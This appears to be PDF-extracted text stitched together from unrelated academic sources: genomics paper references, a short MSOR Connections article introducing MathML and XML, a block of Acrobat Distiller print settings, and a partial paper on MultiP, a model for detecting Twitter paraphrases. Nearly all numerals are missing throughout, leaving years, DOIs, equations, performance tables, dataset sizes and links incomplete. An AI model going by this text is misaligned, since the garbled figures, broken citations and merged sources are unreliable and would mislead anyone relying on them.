jax mouse exome data is available from http://phenome.jax.org/db/q?rtn=projects/ projdet&reqprojid= . the bacterial isolates are available from the sra. the accessions are available in supplemental information . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references beroukhim r, mermel ch, porter d, wei g, raychaudhuri s, donovan j, barretina j, boehm js, dobson j, urashima m, henry ktm, pinchback rm, ligon ah, cho yj, haery l, greulich h, reich m, winckler w, lawrence ms, weir ba, tanaka ke, chiang dy, bass aj, loo a, hoffman c, prensner j, liefeld t, gao q, yecies d, signoretti s, maher e, kaye fj, sasaki h, tepper je, fletcher ja, tabernero j, baselga j, tsao ms, demichelis f, rubin ma, janne pa, daly mj, nucera c, levine rl, ebert bl, gabriel s, rustgi ak, antonescu cr, ladanyi m, letai a, bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid= http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid= http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. garraway la, loda m, beer dg, true ld, okamoto a, pomeroy sl, singer s, golub tr, lander es, getz g, sellers wr, meyerson m. . the landscape of somatic copy-number alteration across human cancers. nature ( ): – doi . /nature . chewapreecha c, harris sr, croucher nj, turner c, marttinen p, cheng l, pessia a, aanensen dm, mather ae, page aj, salter sj, harris d, nosten f, goldblatt d, corander j, parkhill j, turner p, bentley sd. a. dense genomic sampling identifies highways of pneumococcal recombination. nature genetics ( ): – doi . /ng. . chewapreecha c, marttinen p, croucher nj, salter sj, harris sr, mather ae, hanage wp, goldblatt d, nosten fh, turner c, turner p, bentley sd, parkhill j. b. comprehensive identification of single nucleotide polymorphisms associated with beta-lactam resistance within pneumococcal mosaic genes. plos genetics ( ):e doi . /journal.pgen. . croucher nj, finkelstein ja, pelton si, mitchell pk, lee gm, parkhill j, bentley sd, hanage wp, lipsitch m. . population genomics of post-vaccine changes in pneumococcal epidemiology. nature genetics ( ): – doi . /ng. . fairfield h, gilbert gj, barter m, corrigan rr, curtain m, ding y, d’ascenzo m, gerhardt dj, he c, huang w, richmond t, rowe l, probst fj, bergstrom de, murray sa, bult c, richardson j, kile bt, gut i, hager j, sigurdsson s, mauceli e, di palma f, lindblad-toh k, cunningham ml, cox tc, justice mj, spector ms, lowe sw, albert t, donahue l, jeddeloh j, shendure j, reinholdt lg. . mutation discovery in mice by whole exome sequencing. genome biology ( ):r doi . /gb- - - -r . hastie t, tibshirani r, friedman j. . the elements of statistical learning: data mining, inference, and prediction, second edition (springer series in statistics). nd edition. . corr. th printing. new york: springer-verlag. iqbal z, caccamo m, turner i, flicek p, mcvean g. . de novo assembly and geno- typing of variants using colored de bruijn graphs. nature genetics ( ): – doi . /ng. . kamary k, mengersen k, robert cp, rousseau j. . testing hypotheses via a mixture estimation model. arxiv preprint. arxiv: . . li h. . exploring single-sample snp and indel calling with whole-genome de novo assembly. bioinformatics ( ): – doi . /bioinformatics/bts . ochman h, lawrence jg, groisman ea. . lateral gene transfer and the nature of bacterial innovation. nature ( ): – doi . / . peterlongo p, schnel n, pisanti n, sagot mf, lacroix v. . identifying snps without a reference genome by comparing raw reads. in: string processing and information retrieval. berlin heidelberg: springer, – . price al, zaitlen na, reich d, patterson n. . new approaches to population strati- fication in genome-wide association studies. nature reviews genetics ( ): – doi . /nrg . bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /ng. http://dx.doi.org/ . /ng. http://dx.doi.org/ . /journal.pgen. http://dx.doi.org/ . /ng. http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /ng. http://dx.doi.org/ . /ng. http://arxiv.org/abs/ . http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . / http://dx.doi.org/ . /nrg http://dx.doi.org/ . /nrg http://dx.doi.org/ . /peerj-cs. rakov av, ubukata k, robinson da. . population structure of hyperinvasive serotype f, clonal complex streptococcus pneumoniae revealed by multilocus boxb sequence typing. infection, genetics and evolution ( ): – doi . /j.meegid. . . . schölkopf b, smola aj. . learning with kernels: support vector machines, regular- ization, optimization, and beyond (adaptive computation and machine learning). st. cambridge: mit press. sokal rr, rohlf fj. . biometry: the principles and practices of statistics in biological research. rd edition. new york: w. h. freeman. uricaru r, rizk g, lacroix v, quillery e, plantard o, chikhi r, lemaitre c, peter- longo p. . reference-free detection of isolated snps. nucleic acids research ( ):e –e doi . /nar/gku . wallace cs, boulton dm. . an information measure for classification. the computer journal ( ): – doi . /comjnl/ . . . bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.meegid. . . http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /peerj-cs. mathml / xml series: an introduction....msor connections nov vol no peter james rowlett nottingham trent university peter.rowlett@ntu.ac.uk mathml / xml series: an introduction msor connections nov vol no the extensible markup language (xml) is changing the way the worldworks...the word processor used to write this piece is storing the text and style information using xml. the firefox web browser from the mozilla foundation, which is battling for web browser market share with microsoft’s internet explorer browser [ ], uses the xml language xul to describe its user interface. with the interface in an open format, firefox is customisible [ ]. you may have heard of the rss feed format (although apparently more people use rss than have heard of it [ ]) or of it’s audio, and lately video-based equivalent, the podcast. both are xml implementations. you might use xml for satellite navigation [ ] or to modify your favourite computer game [ ]. linguists, concerned that data recorded on endangered languages may become lost are using xml as a storage method that they can be “sure will be accessible indefinitely into the future” [ ]. they know that by basing their data storage on a free and open standard they can ensure that the future tools will be able to access the data stored today. some implementations that may be of particular interest to the msor community are: mathml, used to store mathematics in an unambiguous, machine readable format; and svg and x d, used to create d and d diagrams and animations in a non-proprietary format. these are just a few examples. nasa remarks: “government, industry, and academia are all embracing xml as a technology that will assist in the sharing and reuse of information” [ ]. broadly speaking, xml is a method for describing the structure of data and storing that data. xml is free to use, platform independent, non-proprietary and built on international data encoding standards. this means users with ‘non-standard technologies’ like linux, firefox, a screenreader or a non- english language can access the data equally. programs can be written to access the data from any platform, and being able to use an xml resource into the future does not depend on any company or organisation’s continued existence, as it might with a proprietary format. using the xml implementation mathml, one arrives at a free, open, platform independent, non-proprietary format for describing mathematics notation. your web browser has a language for describing mathematics that your computer algebra system can also speak. mathematics stored as mathml can be unambiguously translated into other formats, such as spoken english or mathematical braille. a search engine can be written which searches mathml webpages for the actual mathematics used, not just for the english text likely to accompany it. while mathml is obviously the xml format of most specific relevance for the msor community, there are plenty of other xml implementations available and upcoming that may be of use. and xml languages are created all the time by individuals to fit a particular need for a particular piece of work. exciting things are certainly possible with mathml and xml. how is the msor community taking advantage of this? this introduction is intended to mark the start of a series of articles within msor connections. upcoming articles will explore the mathml format, mathml / xml series: an introduction peter james rowlett msor connections nov vol no other xml formats and look at the way people are using these. this is where your help is needed: • do you offer your course notes on the web using mathml or another xml format? how do you generate this? • do you podcast your lectures? • have a look at the software you use. does it use xml? how might you take advantage of this? • have you written a program which makes use of xml? does your teaching and learning project store data as xml? • does your statistical package use xml for data storage? • do you have an idea for an xml application you’d like to discuss? • are you screaming at this page for missing an obvious application of xml? • do you disagree with something written above? have you tried using xml and found it unsuited to your needs? debate is certainly encouraged! will you share your experiences through msor connections? please contact the editors if you are able to write or contribute to an article for this series. references [ ] barker, c. firefox market share on a rollercoaster ride [online]. in: zdnet uk, october . at: http://news.zdnet.co.uk/internet/ , , , .htm [accessed october ]. [ ] hamiter, e. how to create mozilla firefox extensions [online], . at: http:// roachfiend.com/archives/ / / /how-to- create-firefox-extensions/ [accessed october ]. [ ] burns, e. more use rss than have heard of it [online]. in: clickz network, october . at: http://www.clickz.com/stats/sectors/ search_tools/article.php/ [accessed october ]. [ ] foster, d., ed. gpx: the gps exchange format [online], . at: http://www.topografix.com/ gpx.asp [accessed october ]. [ ] callaham, j. civilization iv mod details [online]. game cloud, . at: http:// www.gamecloud.com/article.php?article_id= [accessed october ]. [ ] webster, a. digital race to save languages [online]. in: bbc news, march . at: http:// news.bbc.co.uk/ /hi/technology/ .stm [accessed october ]. [ ] nasa. nasa xml project [online], . at: http://xml.nasa.gov/ [accessed october ]. remember that the maths, stats & or network maintains a list of mathml resources, at: www.mathstore.ac.uk/mathml/ << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /all /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /tags /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjdffile false /createjobticket false /defaultrenderingintent /default /detectblends true /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preserveepsinfo true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile () /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /downsamplecolorimages true /colorimagedownsampletype /bicubic /colorimageresolution /colorimagedepth - /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /dctencode /autofiltercolorimages true /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /downsamplegrayimages true /grayimagedownsampletype /bicubic /grayimageresolution /grayimagedepth - /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /dctencode /autofiltergrayimages true /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /downsamplemonoimages true /monoimagedownsampletype /bicubic /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile () /pdfxoutputcondition () /pdfxregistryname (http://www.color.org) /pdfxtrapped /unknown /description << /fra <feff f f e d e e f d e f e e e f c f e e c e f e c e d f e d e c f e e c f c f f d e e f c f e e f c e e> /enu (use these settings to create pdf documents with higher image resolution for improved printing quality. the pdf documents can be opened with acrobat and reader . and later.) /jpn <feff e a d b a f ad e cf ea b cf b f f c b d b f f e e b cea b fdd c d e e a d b a f c f f f f a e ee d a d e > /deu <feff e e e c c e e a d c c e f e d f b d e e d e f e c c f e c d e c c e a a c e e d f b d e b f e e e d f f d d e e f f e e e> /ptb <feff c a f e e f f d e f f d d f c e e f d d f f d c d e f d c f e f f d e f f d f f d f f c e f e> /dan <feff e c c e c f d f b d e d f a c c f c f e e f e b b c e d f b d e b e e e d f f e f e e> /nld <feff b a e c c e e f d d f d e e d b e d e f c e f c f f e b b c e d f d e e b e e e f e f e d f e e e f e> /esp <feff f f e f d e f f e d f f c f e d e d e c c c d d e c f f d e f e f e f e f e f f e> /suo <feff e e e e c c f e c f d b a f a c a f e c f c f e b f b a b e b b e d b a f e f d a f e d f a c d c c d d c c f c c e> /ita <feff d f a f e f d e f e e f c a f e d f e c e d d c f e f d e f f e f f e f e f e e> /nor <feff b e e c c e e c e f d f b d e d f c f c f e e f b b c e d f b d e e b e e e d f f e f e e> /sve <feff e e e e e e c c e e e e e c c b d f b d e d f c c f e e f e d e e b b c e d f b d e e b e f e d f f e c c e e> >> >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice extracting lexically divergent paraphrases from twitter wei xu , alan ritter , chris callison-burch , william b. dolan and yangfeng ji university of pennsylvania, philadelphia, pa, usa {xwe, ccb}@cis.upenn.edu the ohio state university, columbus, oh, usa ritter. @osu.edu microsoft research, redmond, wa, usa billdol@microsoft.com georgia institute of technology, atlanta, ga, usa jiyfeng@gatech.edu abstract we present multip (multi-instance learn- ing paraphrase model), a new model suited to identify paraphrases within the short mes- sages on twitter. we jointly model para- phrase relations between word and sentence pairs and assume only sentence-level annota- tions during learning. using this principled la- tent variable model alone, we achieve the per- formance competitive with a state-of-the-art method which combines a latent space model with a feature-based supervised classifier. our model also captures lexically divergent para- phrases that differ from yet complement previ- ous methods; combining our model with pre- vious work significantly outperforms the state- of-the-art. in addition, we present a novel an- notation methodology that has allowed us to crowdsource a paraphrase corpus from twit- ter. we make this new dataset available to the research community. introduction paraphrases are alternative linguistic expressions of the same or similar meaning (bhagat and hovy, ). twitter engages millions of users, who nat- urally talk about the same topics simultaneously and frequently convey similar meaning using diverse linguistic expressions. the unique characteristics of this user-generated text presents new challenges and opportunities for paraphrase research (xu et al., b; wang et al., ). for many applications, like automatic summarization, first story detection (petrović et al., ) and search (zanzotto et al., ), it is crucial to resolve redundancy in tweets (e.g. oscar nom’d doc ↔ oscar-nominated docu- mentary). in this paper, we investigate the task of determin- ing whether two tweets are paraphrases. previous work has exploited a pair of shared named entities to locate semantically equivalent patterns from re- lated news articles (shinyama et al., ; sekine, ; zhang and weld, ). but short sentences in twitter do not often mention two named entities (ritter et al., ) and require nontrivial general- ization from named entities to other words. for ex- ample, consider the following two sentences about basketball player brook lopez from twitter: ◦ that boy brook lopez with a deep ◦ brook lopez hit a and i missed it although these sentences do not have many words in common, the identical word “ ” is a strong indicator that the two sentences are paraphrases. we therefore propose a novel joint word-sentence approach, incorporating a multi-instance learning assumption (dietterich et al., ) that two sen- tences under the same topic (we highlight topics in bold) are paraphrases if they contain at least one word pair (we call it an anchor and highlight with underscores; the words in the anchor pair need not be identical) that is indicative of sentential para- phrase. this at-least-one-anchor assumption might be ineffective for long or randomly paired sentences, but holds up better for short sentences that are tem- porally and topically related on twitter. moreover, our model design (see figure ) allows exploitation of arbitrary features and linguistic resources, such as part-of-speech features and a normalization lex- (a) (b) figure : (a) a plate representation of the multip model (b) an example instantiation of multip for the pair of sentences “manti bout to be the next junior seau” and “teo is the little new junior seau”, in which a new american football player manti te’o was being compared to a famous former player junior seau. only out of the total × word pairs, z - z , are shown here. icon, to discriminatively determine word pairs as paraphrastic anchors or not. our graphical model is a major departure from popular surface- or latent- similarity methods (wan et al., ; guo and diab, ; ji and eisenstein, , and others). our approach to extract para- phrases from twitter is general and can be com- bined with various topic detecting solutions. as a demonstration, we use twitter’s own trending topic service to collect data and conduct experiments. while having a principled and extensible design, our model alone achieves performance on par with a state-of-the-art ensemble approach that involves both latent semantic modeling and supervised classi- fication. the proposed model also captures radically different paraphrases from previous approaches; a combined system shows significant improvement over the state-of-the-art. this paper makes the following contributions: ) we present a novel latent variable model for paraphrase identification, that specifically ac- commodates the very short context and di- vergent wording in twitter data. we exper- imentally compare several representative ap- proaches and show that our proposed method more information about twitter’s trends: https://support.twitter.com/articles/ -faqs-about-twitter-s-trends yields state-of-the-art results and identifies paraphrases that are complementary to previ- ous methods. ) we develop an efficient crowdsourcing method and construct a twitter paraphrase corpus of about , sentence pairs, as a first common testbed for the development and comparison of paraphrase identification and semantic similar- ity systems. we make this dataset available to the research community. joint word-sentence paraphrase model we present a new latent variable model that jointly captures paraphrase relations between sentence pairs and word pairs. it is very different from previous ap- proaches in that its primary design goal and motiva- tion is targeted towards short, lexically diverse text on the social web. . at-least-one-anchor assumption much previous work on paraphrase identification has been developed and evaluated on a specific benchmark dataset, the microsoft research para- phrase corpus (dolan et al., ), which is de- the dataset and code are made available at: semeval- shared task http://alt.qcri.org/semeval / task / and https://github.com/cocoxu/ twitterparaphrase/ corpus examples news ◦ revenue in the first quarter of the year dropped percent from the same period a year earlier. ◦ with the scandal hanging over stewart’s company, revenue in the first quarter of the year dropped percent from the same period a year earlier. (dolan and brockett, ) ◦ the senate select committee on intelligence is preparing a blistering report on prewar intelligence on iraq. ◦ american intelligence leading up to the war on iraq will be criticized by a pow- erful us congressional committee due to report soon, officials said today. ◦ can klay thompson wake up ◦ cmon klay need u to get it going twitter (this work) ◦ ezekiel ansah wearing d glasses wout the lens ◦ wait ezekiel ansah is wearing d movie glasses with the lenses knocked out ◦ marriage equality law passed in rhode island ◦ congrats to rhode island becoming the th state to enact marriage equality table : representative examples from paraphrase corpora. the average sentence length is . words in twitter vs. . in the news corpus. rived from news articles. twitter data is very dif- ferent, as shown in table . we observe that among tweets posted around the same time about the same topic (e.g. a named entity), sentential paraphrases are short and can often be “anchored” by lexical paraphrases. this intuition leads to the at-least-one- anchor assumption we stated in the introduction. the anchor could be a word the two sentences share in common. it also could be a pair of different words. for example, the word pair “next ‖ new” in two tweets about a new player manti te’o to a fa- mous former american football player junior seau: ◦ manti bout to be the next junior seau ◦ teo is the little new junior seau further note that not every word pair of similar meaning indicates sentence-level paraphrase. for example, the word “ ”, shared by two sentences about movie “iron man” that refers to the rd se- quel of the movie, is not a paraphrastic anchor: ◦ iron man was brilliant fun ◦ iron man tonight see what this is like therefore, we use a discriminative model at the word-level to incorporate various features, such as part-of-speech features, to determine how probable a word pair is a paraphrase anchor. . multi-instance learning paraphrase model (multip) the at-least-one-anchor assumption naturally leads to a multi-instance learning problem (dietterich et al., ), where the learner only observes labels on bags of instances (i.e. sentence-level paraphrases in this case) instead of labels on each individual in- stance (i.e. word pair). we formally define an undirected graphical model of multi-instance learning for paraphrase identifica- tion – multip. figure shows the proposed model in plate form and gives an example instantiation. the model has two layers, which allows joint rea- soning between sentence-level and word-level com- ponents. for each pair of sentences si = (si ,si ), there is an aggregate binary variable yi that represents whether they are paraphrases, and which is observed in the labeled training data. let w(sik) be the set of words in the sentence sik , excluding the topic names. for each word pair wj = (wj ,wj ) ∈ w(si ) × w(si ), there exists a latent variable zj which denotes whether the word pair is a paraphrase anchor. in total there are m = |w(si )|× |w(si )| word pairs, and thus zi = z ,z , ...,zj, ...,zm. our at-least-one-anchor assumption is realized by a deterministic-or function; that is, if there exists at least one j such that zj = , then the sentence pair is a paraphrase. our conditional paraphrase identification model is defined as follows: p(zi,yi|wi;θ) = m∏ j= φ(zj,wj;θ)×σ(zi,yi) = m∏ j= exp(θ ·f(zj,wj))×σ(zi,yi) ( ) where f(zj,wj) is a vector of features extracted for the word pair wj, θ is the parameter vector, and σ is the factor that corresponds to the deterministic-or constraint: σ(zi,yi) =   if yi = true∧∃j : zj = if yi = false∧∀j : zj = otherwise ( ) . learning to learn the parameters of the word-level paraphrase anchor classifier, θ, we maximize likelihood over the sentence-level annotations in our paraphrase corpus: θ∗ = arg max θ p(y|w;θ) = arg max θ ∏ i ∑ zi p(zi,yi|wi;θ) ( ) an iterative gradient-ascent approach is used to estimate θ using perceptron-style additive updates (collins, ; liang et al., ; zettlemoyer and collins, ; hoffmann et al., ). we define an update based on the gradient of the conditional log likelihood using viterbi approximation, as follows: ∂ log p(y|w;θ) ∂θ = ep(z|w,y;θ)( ∑ i f(zi, wi)) − ep(z,y|w;θ)( ∑ i f(zi, wi)) ≈ ∑ i f(z∗i , wi)− ∑ i f(z′i, wi) ( ) where we define the feature sum for each sentence f(zi, wi) = ∑ j f(zj,wj) over all word pairs. these two above expectations are approximated by solving two simple inference problems as maxi- mizations: z∗ = arg max z p(z|w, y;θ) y′, z′ = arg max y,z p(z, y|w;θ) ( ) input: a training set {(si,yi)|i = ...n}, where i is an index corresponding to a particular sentence pair si, and yi is the training label. : initialize parameter vector θ ← : for i ← to n do : extract all possible word pairs wi = w ,w , ...,wm and their features from the sentence pair si : end for : for l ← to maximum iterations do : for i ← to n do : (y′i, z ′ i) ← arg maxyi,zi p(zi,yi|wi;θ) : if y′i = yi then : z∗i ← arg maxzi p(zi|wi,yi;θ) : θ ← θ + f(z∗i , wi)−f(z ′ i, wi) : end if : end for : end for : return model parameters θ figure : multip learning algorithm computing both z′ and z∗ are rather straightfor- ward under the structure of our model and can be solved in time linear in the number of word pairs. the dependencies between z and y are defined as deterministic-or factors σ(zi,yi), which when sat- isfied do not affect the overall probability of the solution. each sentence pair is independent con- ditioned on the parameters. for z′, it is sufficient to independently compute the most likely assign- ment z′i for each word pair, ignoring the determin- istic dependencies. y′i is then set by aggregating all z′i through the deterministic-or operation. sim- ilarly, we can find the exact solution for z∗, the most likely assignment that respects the sentence- level training label y. for a positive training in- stance, we simply find its highest scored word pair wτ by the word-level classifier, then set z∗τ = and z∗j = arg maxx∈ , φ(x,wj;θ) for all j = τ; for a negative example, we set z∗i = . the time com- plexity of both inferences for one sentence pair is o(|w(s)| ), where |w(s)| is the number of word pairs. in practice, we use online learning instead of opti- mizing the full objective. the detailed learning algo- rithm is presented in figure . following hoffmann et al. ( ), we use iterations in the experiments. . feature design at the word-level, our discriminative model allows use of arbitrary features that are similar to those in monolingual word alignment models (maccartney et al., ; thadani and mckeown, ; yao et al., a,b). but unlike discriminative mono- lingual word alignment, we only use sentence-level training labels instead of word-level alignment annotation. for every word pair, we extract the following features: string features that indicate whether the two words, their stemmed forms and their normalized forms are the same, similar or dissimilar. we used the morpha stemmer (minnen et al., ), jaro-winkler string similarity (winkler, ) and the twitter normalization lexicon by han et al. ( ). pos features that are based on the part-of-speech tags of the two words in the pair, specifying whether the two words have same or different pos tags and what the specific tags are. we use the twitter part-of-speech tagger developed by derczynski et al. ( ). we add new fine-grained tags for variations of the eight words: “a”, “be”, “do”, “have”, “get”, “go”, “follow” and “please”. for example, we use a tag ha for words “have”, “has” and “had”. topical features that relate to the strength of a word’s association to the topic. this feature identifies the popular words in each topic, e.g. “ ” in tweets about basketball game, “rip” in tweets about a celebrity’s death. we use g log-likelihood- ratio statistic, which has been frequently used in nlp, as a measure of word associations (dunning, ; moore, ). the significant scores are computed for each trend on an average of about sentences and converted to binary features for every word pair, indicating whether the two words are both significant or not. our topical features are novel and were not used in previous work. following riedel et al. ( ) and hoffmann et al. ( ), we also incor- porate conjunction features into our system for bet- ter accuracy, namely word+pos, word+topical and word+pos+topical features. https://github.com/knowitall/morpha experiments . data it is nontrivial to gather a gold-standard dataset of naturally occurring paraphrases and non- paraphrases efficiently from twitter, since this requires pairwise comparison of tweets and faces a very large search space. to make this annotation task tractable, we design a novel and efficient crowdsourcing method using amazon mechanical turk. our entire data collection process is de- tailed in section § , with several experiments that demonstrate annotation quality and efficiency. in total, we constructed a twitter paraphrase cor- pus of , sentence pairs and , unique sen- tences. the training and development set consists of , sentence pairs posted between april th and may rd, from + trending topics (ex- cluding hashtags). our paraphrase model and data collection approach is general and can be combined with various twitter topic detecting solutions (diao et al., ; ritter et al., ). as a demonstra- tion, we use twitter’s own trends service since it is easily available. twitter trending topics are de- termined by an unpublished algorithm, which finds words, phrases and hashtags that have had a sharp increase in popularity, as opposed to overall vol- ume. we use case-insensitive exact matching to lo- cate topic names in the sentences. each sentence pair was annotated by different crowdsourcing workers. for the test set, we ob- tained both crowdsourced and expert labels on sentence pairs from randomly sampled twitter trending topics between may th and june th. our dataset is more realistic and balanced, contain- ing % non-paraphrases vs. % in the benchmark microsoft paraphrase corpus of news data. as noted in (das and smith, ), the lack of natural non- paraphrases in the msr corpus creates bias towards certain models. . baselines we use four baselines to compare with our proposed approach for the sentential paraphrase identification task. for the first baseline, we choose a super- vised logistic regression (lr) baseline used by das and smith ( ). it uses simple n-gram (also in stemmed form) overlapping features but shows very method f precision recall random . . . wtmf (guo and diab, )* . . . lr (das and smith, )** . . . lexlatent . . . lexdiscrim (ji and eisenstein, ) . . . multip . . . human upperbound . . . table : performance of different paraphrase identification approaches on twitter data. *an enhanced version that uses additional . million sentences from twitter. ** reimplementation of a strong baseline used by das and smith ( ). competitive performance on the msr corpus. the second baseline is a state-of-the-art unsu- pervised method, weighted textual matrix factor- ization (wtmf), which is specially developed for short sentences by modeling the semantic space of both words that are present in and absent from the sentences (guo and diab, ). the origi- nal model was learned from wordnet (fellbaum, ), ontonotes (hovy et al., ), wiktionary, the brown corpus (francis and kucera, ). we enhance the model with . million sentences from twitter as suggested by guo et al. ( ). ji and eisenstein ( ) presented a state-of- the-art ensemble system, which we call lexdis- crim. it directly combines both discriminatively- tuned latent features and surface lexical features into a svm classifier. specifically, the latent representa- tion of a pair of sentences ~v and ~v is converted into a feature vector, [~v + ~v , |~v −~v |], by concatenating the element-wise sum ~v + ~v and absolute different |~v − ~v |. we also introduce a new baseline, lexlatent, which is a simplified version of lexdiscrim and easy to reproduce. it uses the same method to com- bine latent features and surface features, but com- bines the open-sourced wtmf latent space model and the logistic regression model from above in- stead. it achieves similar performance as lexdis- crim on our dataset (table ). the source code and data for wtmf is available at: http://www.cs.columbia.edu/˜weiwei/code. html the parsing feature was removed because it was not helpful on our twitter dataset. . system performance for evaluation of different systems, we compute precision-recall curves and report the highest f measure of any point on the curve, on the test dataset of sentence pairs against the expert labels. ta- ble shows the performance of different systems. our proposed multip, a principled latent variable model alone, achieves competitive results with the state-of-the-art system that combines discriminative training and latent semantics. in table , we also show the agreement levels of labels derived from non-expert annotations on me- chanical turk, which can be considered as an up- perbound for automatic paraphrase recognition task performed on this data set. the annotation quality of our corpus is surprisingly good given the fact that the definition of paraphrase is rather inexact (bhagat and hovy, ); the inter-rater agreement between expert annotators on news data is only . as re- ported by dolan et al. ( ). f prec recall multip . . . - string features . . . - pos features . . . - topical features . . . table : feature ablation by removing each individ- ual feature group from the full set. to assess the impact of different features on the model’s performance, we conduct feature ablation experiments, removing one group of features at a time. the results are shown in table . both string para? sentence pair from twitter multip lexlatent yes ◦ the new ciroc flavor has arrived rank= rank= ◦ ciroc got a new flavor comin out yes ◦ roberto mancini gets the boot from man city rank= rank= ◦ roberto mancini has been sacked by manchester city with the blues saying yes ◦ i want to watch the purge tonight rank= rank= ◦ i want to go see the purge who wants to come with no ◦ somebody took the marlins to innings rank= rank= ◦ anyone who stayed innings for the marlins no ◦ world of jenks is on at rank= rank= ◦ world of jenks is my favorite show on tv table : example system outputs; rank is the position in the list of all candidate paraphrase pairs in the test set ordered by model score. multip discovers lexically divergent paraphrases while lexlatent prefers more overall sentence similarity. underline marks the word pair(s) with highest estimated probability as paraphrastic anchor(s) for each sentence pair. . . . . . . . . . . . . recall p re ci si on multip lexlatent . . . . . . . . . . . . recall p re ci si on multip−pe lexlatent figure : precision and recall curves. our multip model alone achieves competitive performance with the lexlatent system that combines latent space model and feature-based supervised classifier. the two approaches have complementary strengths, and achieves significant improvement when combined together (multip-pe). and pos features are essential for system perfor- mance, while topical features are helpful but not as crucial. figure presents precision-recall curves and shows the sensitivity and specificity of each model in comparison. in the first half of the curve (recall < . ), multip model makes bolder and less ac- curate decisions than lexlatent. however, the curve for multip model is more flat and shows con- sistently better precision at the second half (recall > . ) as well as a higher maximum f score. this re- sult reflects our design concept of multip, which is intended to pick up sentential paraphrases with more divergent wordings aggressively. lexlatent, as a combined system, considers sentence features in both surface and latent space and is more conserva- tive. table further illustrates this difference with some example system outputs. . product of experts (multip-pe) our multip model and previous similarity-based approaches have complementary strengths, so we experiment with combining multip (pm) and lexlatent (pl) through a product of experts (hinton, ): p(y|s ,s ) = pm(y|s ,s )×pl(y|s ,s )∑ y pm(y|s ,s )×pl(y|s ,s ) ( ) the resulting system multip-pe provides con- sistently better precision and recall over the lexlatent model, as shown on the right in figure . the multip-pe system outperforms lexlatent significantly according to a paired t- test with ρ less than . . our proposed mul- tip takes advantage of twitter’s specific properties and provides complementary information to previ- ous approaches. previously, das and smith ( ) has also used a product of experts to combine a lex- ical and a syntax-based model together. constructing twitter paraphrase corpus we now turn to describing our data collection and annotation methodology. our goal is to construct a high quality dataset that contains representative ex- amples of paraphrases and non-paraphrases in twit- ter. since twitter users are free to talk about any- thing regarding any topic, a random pair of sen- tences about the same topic has a low chance (less than %) of expressing the same meaning. this causes two problems: a) it is expensive to obtain paraphrases via manual annotation; b) non-expert annotators tend to loosen the criteria and are more likely to make false positive errors. to address these challenges, we design a simple annotation task and introduce two selection mechanisms to select sentences which are more likely to be paraphrases, while preserving diversity and representativeness. . raw data from twitter we crawl twitter’s trending topics and their associ- ated tweets using public apis. according to twit- ter, trends are determined by an algorithm which more information about twitter’s apis: https://dev. twitter.com/docs/api/ . /overview expert= expert= expert= expert= expert= expert= tu rk = tu rk = tu rk = tu rk = tu rk = tu rk = figure : a heat-map showing overlap between expert and crowdsourcing annotation. the inten- sity along the diagonal indicates good reliability of crowdsourcing workers for this particular task; and the shift above the diagonal reflects the difference between the two annotation schemas. for crowd- sourcing (turk), the numbers indicate how many an- notators out of picked the sentence pair as para- phrases; , are considered non-paraphrases; , , are paraphrases. for expert annotation, all , , are non-paraphrases; , are paraphrases. medium- scored cases are discarded in training and testing in our experiments. identifies topics that are immediately popular, rather than those that have been popular for longer periods of time or which trend on a daily basis. we tokenize and split each tweet into sentences. . task design on mechanical turk we show the annotator an original sentence, then ask them to pick sentences with the same mean- ing from candidate sentences. the original and candidate sentences are randomly sampled from the same topic. for each such vs. question, we ob- tain binary judgements from different annotators, paying each annotator $ . per question. on aver- age, each question takes one annotator about ∼ seconds to answer. . annotation quality we remove problematic annotators by checking their cohen’s kappa agreement (artstein and poe- we use the toolkit developed by 